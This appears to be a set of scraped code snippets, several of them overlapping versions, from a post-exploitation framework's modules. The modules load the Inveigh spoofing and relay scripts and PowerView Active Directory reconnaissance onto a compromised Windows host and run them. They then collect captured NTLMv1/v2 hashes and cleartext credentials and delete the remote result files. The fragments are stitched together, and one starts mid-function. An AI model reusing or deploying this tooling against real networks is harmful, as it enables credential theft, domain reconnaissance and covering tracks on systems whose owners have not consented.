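        # overrides it.
        if command is None and args.GetProxy:
            command = "Get-Proxy"
        if command is None:
            if args.command is None:
                self.error("You have to choose a powerview command!")
                return
            command = args.command

        logging.debug("Executing the following powerview command: %s", command)
        output = execute_powershell_script(self, content, command, script_name=script)
        if not output:
            self.error("No results")
            return
        self.success("Output: \n%s\n" % output)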
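    def run(self, args):
        """Drive Inveigh on the client and collect its result files.

        Exactly one of ``args.getResults``, ``args.InvokeInveigh``,
        ``args.InvokeInveighUnprivileged``, ``args.InvokeInveighRelay`` or
        ``args.StopInveigh`` selects the action (checked in that order):

        * ``getResults``: download the Inveigh output files from the remote
          folder with ``self.downloadInveighFiles`` and return;
        * the three ``Invoke*`` switches: run the matching function from the
          corresponding external Inveigh script with ``-Tool 1 -FileOutput Y
          -OutputDir <remote folder>`` plus ``args.inveighParams``;
        * ``StopInveigh``: run ``Stop-Inveigh``; when the output contains
          "exited at " the result files are downloaded and removed remotely.

        The remote folder is ``%TEMP%`` on the target unless
        ``args.tmpOutFolder`` differs from ``self.DEFAULT_REMOTE_FOLDER``;
        the ``self.path_*_out_file`` attributes are derived from it. The
        Inveigh script is shipped only when it is not registered in
        ``self.client.powershell[<arch>]['scripts_loaded']``.

        Args:
            args: parsed module arguments (see above plus ``localOutputFolder``).
        """
        script = 'inveigh'

        # Folder on the target where Inveigh writes its files.
        if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
            remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
        else:
            remote_temp_folder = args.tmpOutFolder
        logging.debug('%s used for saving real time results on the target', remote_temp_folder)
        # NOTE(review): the folder is interpolated unquoted; a %TEMP% with a
        # space would split the -OutputDir argument. Whether quoting survives
        # execute_powershell_script's wrapping is not visible here -- confirm.
        commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder)
        logging.debug("These folowing Inveigh parameters will be given by default: %s", commonOptions)

        self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE)
        self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE)
        self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE)
        self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE)

        localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)

        if not (args.InvokeInveigh or args.InvokeInveighUnprivileged
                or args.InvokeInveighRelay or args.StopInveigh or args.getResults):
            self.error("You have to give a command")
            return

        if args.getResults:
            nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
            if nb == 0:
                self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?")
            else:
                self.success("All Inveigh results downloaded")
            return

        # NOTE(review): assumes args.inveighParams defaults to '' (string
        # concatenation below) -- confirm against the argument parser.
        inveigh_dir = os.path.join(ROOT, "external", "Inveigh")
        if args.InvokeInveigh:
            self.success("Invoke-Inveigh command selected")
            pathToScript = os.path.join(inveigh_dir, "Inveigh.ps1")
            command = "Invoke-Inveigh" + commonOptions + args.inveighParams
        elif args.InvokeInveighUnprivileged:
            self.success("Invoke-InveighUnprivileged command selected")
            pathToScript = os.path.join(inveigh_dir, "Inveigh-Unprivileged.ps1")
            command = "Invoke-InveighUnprivileged" + commonOptions + args.inveighParams
        elif args.InvokeInveighRelay:
            self.success("Invoke-Relay command selected")
            pathToScript = os.path.join(inveigh_dir, "Inveigh-Relay.ps1")
            command = "Invoke-Relay" + commonOptions + args.inveighParams
        else:  # args.StopInveigh -- the guard above leaves no other case
            pathToScript = os.path.join(inveigh_dir, "Inveigh.ps1")
            command = "Stop-Inveigh"
        logging.debug("The following script will be loaded on the target if needed: %s", pathToScript)

        # Ship the script if either arch lacks it. The original loop only
        # honoured the last arch ('x86'), so a script loaded for x86 but not
        # x64 was never sent although x64IfPossible selects x64 when present.
        missing = False
        for arch in ('x64', 'x86'):
            loaded = self.client.powershell[arch]['scripts_loaded']
            logging.debug("Powershell script actually loaded: %s", loaded)
            if script not in loaded:
                missing = True
        if missing:
            logging.debug("Loading %s script on target...", pathToScript)
            with open(pathToScript, 'r') as f:
                content = f.read()
        else:
            logging.debug("%s script already loaded on target", pathToScript)
            content = ''

        logging.debug("Executing the following inveigh command: %s", command)
        output = execute_powershell_script(self,
                                           content,
                                           command,
                                           x64IfPossible=True,
                                           script_name=script)
        if not output:
            self.error("No results")
            return
        self.success("Output: \n%s\n" % output)
        if args.StopInveigh and "exited at " in str(output):
            self.success("Inveigh is stopped")
            self.downloadInveighFiles(remote_temp_folder, localFolder)
            self.removeRemoteInveighFiles()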
示例#22
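 def run(self, args):
     """Stage the selected Inveigh PowerShell script on the target and run one command.

     Exactly one action flag is expected on ``args``: ``InvokeInveigh``,
     ``InvokeInveighUnprivileged``, ``InvokeInveighRelay``, ``StopInveigh`` or
     ``getResults``.  ``getResults`` only downloads the result files already
     written by a running instance and returns; the other four pick the script
     under ``external/Inveigh`` to load and the PowerShell function to call.

     The remote output folder is ``args.tmpOutFolder`` (``%TEMP%`` on the
     target when left at ``DEFAULT_REMOTE_FOLDER``); the four
     ``self.path_*_out_file`` attributes are derived from it before any
     command is executed.  Output is printed via ``self.success`` / ``self.error``;
     nothing is returned.
     """
     script = 'inveigh'
     pathToScript, command = "", ""

     if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
         # Expanded on the *target*, so %TEMP% resolves to the remote user's temp dir.
         remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
     else:
         remote_temp_folder = args.tmpOutFolder
     logging.debug('{0} used for saving real time results on the target'.format(remote_temp_folder))

     commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder)
     logging.debug("These folowing Inveigh parameters will be given by default: {0}".format(commonOptions))

     # Remote paths are Windows paths regardless of the operator's OS, hence ntpath.
     self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE)
     self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE)
     self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE)
     self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE)

     # Created before the action check so the local folder exists even when the
     # call below errors out (same ordering as before).
     localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)

     if not (args.InvokeInveigh or args.InvokeInveighUnprivileged or args.InvokeInveighRelay
             or args.StopInveigh or args.getResults):
         self.error("You have to give a command")
         return

     if args.getResults:
         # downloadInveighFiles reports how many files it fetched; 0 usually means
         # nothing has been written to remote_temp_folder yet.
         nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
         if nb == 0:
             self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?")
         else:
             self.success("All Inveigh results downloaded")
         return
     elif args.InvokeInveigh:
         self.success("Invoke-Inveigh command selected")
         pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
         command = "Invoke-Inveigh" + commonOptions + args.inveighParams
     elif args.InvokeInveighUnprivileged:
         self.success("Invoke-InveighUnprivileged command selected")
         pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1")
         command = "Invoke-InveighUnprivileged" + commonOptions + args.inveighParams
     elif args.InvokeInveighRelay:
         self.success("Invoke-Relay command selected")
         pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1")
         command = "Invoke-Relay" + commonOptions + args.inveighParams
     elif args.StopInveigh:
         pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
         command = "Stop-Inveigh"
     # NOTE: args.inveighParams is appended to the command line verbatim (no
     # quoting or validation); it is operator input, but a value with embedded
     # PowerShell syntax will be interpreted as such on the target.
     logging.debug("The following script will be loaded on the target if needed: {0}".format(pathToScript))

     # Decide whether the script body must be shipped with the command.
     # NOTE(review): the loop overwrites `content` on each iteration, so only the
     # 'x86' entry actually decides — kept as-is because execute_powershell_script
     # (defined elsewhere) may rely on this; confirm before changing.
     content = ''
     for arch in ['x64', 'x86']:
         logging.debug("Powershell script actually loaded: {0}".format(self.client.powershell[arch]['scripts_loaded']))
         if script not in self.client.powershell[arch]['scripts_loaded']:
             logging.debug("Loading {0} script on target...".format(pathToScript))
             # Context manager so the file handle is released immediately rather
             # than left to the garbage collector.
             with open(pathToScript, 'r') as script_file:
                 content = script_file.read()
         else:
             logging.debug("{0} script already loaded on target".format(pathToScript))
             content = ''

     logging.debug("Executing the following inveigh command: {0}".format(command))
     output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script)
     if not output:
         self.error("No results")
         return
     self.success("Output: \n%s\n" % output)

     # Stop-Inveigh prints "exited at <time>" on success; only then are the
     # remote result files pulled back and removed from the target.
     if args.StopInveigh and "exited at " in str(output):
         self.success("Inveigh is stopped")
         self.downloadInveighFiles(remote_temp_folder, localFolder)
         self.removeRemoteInveighFiles()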
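    def run(self, args):
        """Stage PowerView.ps1 on the target if needed and run one PowerView command.

        The command is chosen from the boolean / value flags on ``args`` (first
        match in ``_POWERVIEW_COMMANDS`` order wins; ``GetProxy`` has the lowest
        precedence, matching the original if/elif layout).  When no flag is set,
        ``args.command`` is used as a free-form command; if that is also missing
        an error is reported.  ``args.list_available_commands`` just prints
        ``self.commands_available`` and returns.  Output goes through
        ``self.success`` / ``self.error``; nothing is returned.
        """
        script = 'powerview'
        if args.list_available_commands:
            self.log(self.commands_available)
            return

        # (args attribute, command template, takes a value).  Boolean entries match
        # when the flag is truthy; value entries match when the value is not None
        # and are formatted into the template.  Order encodes precedence.
        _POWERVIEW_COMMANDS = [
            ("GetNetComputer", "Get-NetComputer", False),
            ("GetNetMssql", "Get-NetComputer -SPN mssql*", False),
            ("GetNetSubnet", "Get-NetSubnet", False),
            ("GetNetGroup", "Get-NetGroup", False),
            ("GetNetGroupWith", "Get-NetGroup -GroupName *{0}* -FullData", True),
            ("GetNetGroupMember", "Get-NetGroupMember", False),
            ("GetNetFileServer", "Get-NetFileServer", False),
            ("GetDFSshare", "Get-DFSshare", False),
            ("GetNetGPO", "Get-NetGPO", False),
            ("GetNetGPOGroup", "Get-NetGPOGroup", False),
            ("FindGPOLocation", "Find-GPOLocation -UserName {0}", True),
            ("GetNetLocalGroup", "Get-NetLocalGroup", False),
            ("GetNetLoggedon", "Get-NetLoggedon", False),
            ("GetNetLoggedonOn", "Get-NetLoggedon -ComputerName {0}", True),
            ("GetNetSession", "Get-NetSession", False),
            ("GetNetSessionOn", "Get-NetSession -ComputerName {0}", True),
            ("GetNetRDPSession", "Get-NetRDPSession", False),
            ("GetNetRDPSessionOn", "Get-NetRDPSession -ComputerName {0}", True),
            ("GetLastLoggedOn", "Get-LastLoggedOn", False),
            ("GetLastLoggedOnOn", "Get-LastLoggedOn -ComputerName {0}", True),
            ("InvokeUserHunterCheck", "Invoke-UserHunter -CheckAccess", False),
            ("InvokeUserHunterForest", "Invoke-UserHunter -SearchForest", False),
            ("GetExploitableSystem", "Get-ExploitableSystem  | Format-Table -AutoSize", False),
            # Last on purpose: the original code set Get-Proxy in a separate `if`
            # that every later flag overrode.
            ("GetProxy", "Get-Proxy", False),
        ]

        command = ""
        for attr, template, takes_value in _POWERVIEW_COMMANDS:
            value = getattr(args, attr)
            if takes_value:
                if value is not None:
                    # NOTE: the value is interpolated without quoting, so names
                    # containing spaces or PowerShell metacharacters will not
                    # round-trip as a single argument.
                    command = template.format(value)
                    break
            elif value:
                command = template
                break

        if command == "":
            if args.command is None:
                self.error("You have to choose a powerview command!")
                return
            command = args.command

        # Decide whether PowerView.ps1 itself has to be sent along with the command.
        # NOTE(review): `content` is overwritten on every iteration, so only the
        # 'x86' entry actually decides — preserved as-is since the loaded-script
        # bookkeeping lives in execute_powershell_script, outside this block.
        content = ''
        for arch in ['x64', 'x86']:
            if script not in self.client.powershell[arch]['scripts_loaded']:
                logging.debug("Loading PowerView.ps1 script on target...")
                # Context manager so the handle is closed immediately instead of
                # being left to the garbage collector.
                with open(os.path.join(ROOT, "external", "PowerSploit", "Recon",
                                       "PowerView.ps1"), 'r') as script_file:
                    content = script_file.read()
            else:
                logging.debug("PowerView.ps1 script already loaded on target")
                content = ''

        logging.debug(
            "Executing the following powerview command: {0}".format(command))
        output = execute_powershell_script(self,
                                           content,
                                           command,
                                           script_name=script)
        if not output:
            self.error("No results")
            return
        self.success("Output: \n%s\n" % output)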